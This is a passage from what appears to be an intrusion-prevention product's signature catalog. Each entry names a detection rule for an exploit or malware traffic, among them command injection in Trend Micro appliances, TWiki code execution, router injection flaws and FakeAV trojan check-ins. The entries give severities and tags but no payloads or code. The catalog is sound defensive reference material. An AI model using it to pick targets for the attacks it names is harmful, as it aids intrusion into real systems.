Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-941-5242
Vulnerability: Trend-Micro-Iwsva-Deploymentwizardaction-Getclusterinfo-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Iwsva-Domains-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-771-5211
Vulnerability: Trend-Micro-Iwsva-Domains-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Iwsva-HttpServlet-Command-Injection

About this situation: A Trend Micro Iwsva HttpServlet Command Injection vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-932-5242
Last changed: sgpkg-ips-932-5242
Vulnerability: Trend-Micro-Iwsva-HttpServlet-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Iwsva-Mailnotification-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1314-5242
Vulnerability: Trend-Micro-Iwsva-Mailnotification-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Trend-Micro-Iwsva-Managevlansettings-Command-Injections

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1318-5242
Last changed: sgpkg-ips-1318-5242
Vulnerability: Trend-Micro-Iwsva-Managevlansettings-Command-Injections
Description:
Back to top

HTTP_CRL-Trend-Micro-Iwsva-Pacfilemanagement-Delete_Pac_Files-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Vulnerability: Trend-Micro-Iwsva-Pacfilemanagement-Delete_Pac_Files-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Iwsva-TestConfiguration-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro IWSVA detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1617-5242
Vulnerability: Trend-Micro-Iwsva-TestConfiguration-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Iwsva-VerboseLog-Directory-Traversal

About this situation: A Trend Micro Iwsva VerboseLog Directory Traversal vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-933-5242
Last changed: sgpkg-ips-933-5242
Vulnerability: Trend-Micro-Iwsva-VerboseLog-Directory-Traversal
Description:
Back to top

HTTP_CRL-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Mobile Security (Enterprise) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Mobile Security, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-993-5242
Last changed: sgpkg-ips-993-5242
Vulnerability: Trend-Micro-Mobile-Security-Enterprise-Eas_Agent-Slink_Id-SQL-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Mobile Security (Enterprise) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Mobile Security, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1038-5242
Vulnerability: Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Mobile-Security-Web_Service-Path-Traversal

About this situation: An attempt to exploit a vulnerability in Trend Micro Mobile Security (Enterprise) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Mobile Security (Enterprise), CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Vulnerability: Trend-Micro-Mobile-Security-Web_Service-Path-Traversal
Description:
Back to top

HTTP_CRL-Trend-Micro-OfficeScan-Cgi-Password-Decryption-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in Trend Micro OfficeScan Policy server
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan Corporate Edition, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-507-5211
Vulnerability: HTTP-Trend-Micro-OfficeScan-Cgi-Password-Decryption-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Trend-Micro-OfficeScan-Proxy.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro OfficeScan detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-970-5242
Vulnerability: Trend-Micro-OfficeScan-Proxy.php-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-OfficeScan-Server-cgiRecvFile-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Trend Micro OfficeScan
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan Corporate Edition, Trend Micro Client Server Messaging Security for SMB, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-1225-5242
Vulnerability: Trend-Micro-OfficeScan-Server-cgiRecvFile-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Dead_Local_Device-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-956-5242
Last changed: sgpkg-ips-956-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Dead_Local_Device-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool-Devid-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Devicetool-Devid-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_Device_Info-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_Device_Info-SQL-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_nic_Device-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-895-5242
Last changed: sgpkg-ips-895-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_nic_Device-SQL-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Restartservice-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-864-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Restartservice-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Rollback-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Rollback-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Storage-Discovery_iSCSI_Device-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-864-5242
Vulnerability: Trend-Micro-Safesync-Enterprise-Storage-Discovery_iSCSI_Device-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Storage.pm-Device_Id-Role-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro SafeSync for Enterprise detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro SafeSync for Enterprise, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-925-5242
Vulnerability: Trend-Micro-Safesync-For-Enterprise-Storage.pm-Device_Id-Role-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Smart-Protection-Server-Admin_notification.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Smart Protection Server detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Trend Micro Smart Protection Server, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-824-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: Trend-Micro-Smart-Protection-Server-Admin_notification.php-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Smart-Protection-Server-ccca_ajaxhandler.php-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Trend Micro Smart Protection Server detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Trend Micro Smart Protection Server, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: Trend-Micro-Smart-Protection-Server-ccca_ajaxhandler.php-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Trend-Micro-Smart-Protection-Server-Wcs_Bwlists_Handler-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Smart Protection Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Smart Protection Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-880-5242
Vulnerability: Trend-Micro-Smart-Protection-Server-Wcs_Bwlists_Handler-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Virtual-Mobile-Infrastructure-DoS

About this situation: An attempt to exploit a vulnerability in Trend Micro Virtual Mobile Infrastructure
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Virtual Mobile Infrastructure, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-824-5242
Last changed: sgpkg-ips-824-5242
Description:
Back to top

HTTP_CRL-Trixbox-Directory-Traversal

About this situation: An attempt to exploit a Trixbox Directory Traversal vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Trixbox, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-865-5242
Vulnerability: Trixbox-Directory-Traversal
Description:
Back to top

HTTP_CRL-Trojan-Ad-Clicker-Activity-Detected

About this situation: Trojan Ad Clicker activity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Description:
Back to top

HTTP_CRL-Trojan-Downloader-MSIL-OnyxDropper-A

About this situation: Trojan Downloader MSIL OnyxDropper A traffic was detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Trojan-Downloader-MSIL-OnyxDropper-A
Description:
Back to top

HTTP_CRL-Trojan-FakeAV-Checkin

About this situation: Trojan FakeAV checkin
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-364-4219
Last changed: sgpkg-ips-404-4219
Vulnerability: FakeAV-Botnet
Description:
Back to top

HTTP_CRL-Trojan-FakeAV-File-Download

About this situation: Trojan FakeAV file download detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-364-4219
Last changed: sgpkg-ips-364-4219
Vulnerability: FakeAV-Botnet
Description:
Back to top

HTTP_CRL-Trojan-Shell-Retemuja-A

About this situation: Trojan Shell Retemuja A traffic was detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Potential Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Trojan-Shell-Retemuja-A
Description:
Back to top

HTTP_CRL-TrueOnline-Billion-5200W-T-Router-Command-Injection

About this situation: A TrueOnline Billion 5200W-T Router Command Injection vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Billion 5200W-T, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Vulnerability: TrueOnline-Billion-5200W-T-Router-Command-Injection
Description:
Back to top

HTTP_CRL-TrueOnline-ZyXEL-P660HN-T-V1-Router-ViewLog.asp-Command-Injection

About this situation: A TrueOnline ZyXEL P660HN-T V1 Router ViewLog.asp Command Injection vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL P660HN, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1622-5242
Vulnerability: TrueOnline-ZyXEL-P660HN-T-V1-Router-ViewLog.asp-Command-Injection
Description:
Back to top

HTTP_CRL-TrueOnline-ZyXEL-P660HN-T-V2-Router-logSet.asp-Command-Injection

About this situation: A TrueOnline ZyXEL P660HN-T V2 Router logSet.asp Command Injection vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ZyXEL P660HN, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1622-5242
Vulnerability: TrueOnline-ZyXEL-P660HN-T-V2-Router-logSet.asp-Command-Injection
Description:
Back to top

HTTP_CRL-TWiki-And-Foswiki-MAKETEXT-Remote-Command-Execution

About this situation: An attempt to exploit a TWiki And Foswiki MAKETEXT Remote Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TWiki, Foswiki, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-707-5211
Last changed: sgpkg-ips-709-5211
Vulnerability: TWiki-And-Foswiki-MAKETEXT-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-TWiki-Configure-Script-TYPEOF-Parameter-Perl-Code-Execution

About this situation: Detects Perl code execution exploits against TWiki
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TWiki, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-76-1314
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-TWiki-Configure-Script-TYPEOF-Parameter-Perl-Code-Execution
Description:
Back to top

HTTP_CRL-TWiki-Remote-Perl-Code-Execution

About this situation: An attempt to exploit a TWiki Remote Perl Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TWiki, CVE2014, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-769-5211
Vulnerability: TWiki-Remote-Perl-Code-Execution
Description:
Back to top

HTTP_CRL-TWiki-Rev-Parameter-Command-Execution

About this situation: Detects TWiki 'rev' parameter command execution
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TWiki, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1338-5242
Vulnerability: HTTP-TWiki-Rev-Parameter-Command-Execution
Description:
Back to top

HTTP_CRL-TWiki-Search-Function-Command-Execution-Vulnerability

About this situation: Attempt to execute arbitrary command via vulnerable TWiki script
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TWiki, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-507-5211
Vulnerability: TWiki-Search-Function-Command-Execution-Vulnerability
Description:
Back to top

HTTP_CRL-Twister-IP-Update

About this situation: Twister mp3 search and download tool detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Windows, Any Hardware, Twister, Windows not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-503-5211
Vulnerability: Twister-Music-File-Search-And-Download-Tool
Description:
Back to top

HTTP_CRL-Twister-Search

About this situation: Twister mp3 search and download tool detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Windows, Any Hardware, Twister, Windows not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-203-2032
Last changed: sgpkg-ips-503-5211
Vulnerability: Twister-Music-File-Search-And-Download-Tool
Description:
Back to top

HTTP_CRL-Twitter-TwitterServer-Histogramqueryhandler-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Twitter TwitterServer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TwitterServer, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1318-5242
Last changed: sgpkg-ips-1318-5242
Vulnerability: Twitter-TwitterServer-Histogramqueryhandler-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-TYPO3-CMS-Phar-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in TYPO3 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TYPO3, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1589-5242
Vulnerability: TYPO3-CMS-Phar-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-TYPO3-CMS-Sanitizelocalurl-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in TYPO3 Association TYPO3 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TYPO3, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: TYPO3-CMS-Sanitizelocalurl-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-TYPO3-Lux-Extension-SQL-Injection

About this situation: An attempt to exploit a vulnerability in TYPO3 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TYPO3, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Vulnerability: TYPO3-Lux-Extension-SQL-Injection
Description:
Back to top

HTTP_CRL-Ultra-Mini-Httpd-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ultra-Mini Httpd detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Ultra Mini HTTPD, CVE2013, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-660-5211
Vulnerability: Ultra-Mini-Httpd-Stack-Based-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Unauthenticated-RCE-In-Bricks-Builder-Theme

About this situation: An attempt to exploit a vulnerability in the Bricks Builder Theme for WordPress detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, WordPress Bricks Builder Theme, CVE2024, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1715-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Unauthenticated-RCE-In-Bricks-Builder-Theme
Description:
Back to top

HTTP_CRL-Unauthenticated-Remote-Code-Execution-In-Ignition

About this situation: An attempt to exploit a vulnerability in Ignition Laravel detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Any Hardware, Ignition Laravel, CVE2021, Windows not specific, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Unauthenticated-Remote-Code-Execution-In-Ignition
Description:
Back to top

HTTP_CRL-Unitrends-UEB-api/storage-Remote-Root

About this situation: A Unitrends UEB api/storage Remote Root vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Unitrends, CVE2017, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Vulnerability: Unitrends-UEB-api/storage-Remote-Root
Description:
Back to top

HTTP_CRL-Unix-IFS-Code-Execution

About this situation: An attempt to execute code on Unix operation system
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1214-5242
Vulnerability: Unix-IFS-Code-Execution
CCTV-DVR-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Unraid-Auth-Bypass-PHP-RCE

About this situation: An attempt to exploit a vulnerability in Unraid detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Unraid, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1291-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Unraid-Auth-Bypass-PHP-RCE
Description:
Back to top

HTTP_CRL-Untangle-NG-Firewall-execEvil-Command-Injection

About this situation: An attempt to exploit a vulnerability in Untangle
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Untangle, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-816-5242
Vulnerability: Untangle-NG-Firewall-execEvil-Command-Injection
Description:
Back to top

HTTP_CRL-URI-Directory-Traversal-2

About this situation: Directory traversal attempt in HTTP request
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: Generic-HTTP-URI-Directory-Traversal
Description:
Back to top

HTTP_CRL-Vandyke-Vshell-Server-Trigger-Command-Injection

About this situation: An attempt to exploit a vulnerability in VanDyke VShell detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, VanDyke VShell, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1479-5242
Last changed: sgpkg-ips-1479-5242
Vulnerability: Vandyke-Vshell-Server-Trigger-Command-Injection
Description:
Back to top

HTTP_CRL-VBulletin-Forum-Calendar-SQL-Injection

About this situation: Vulnerable calendar.php accessed
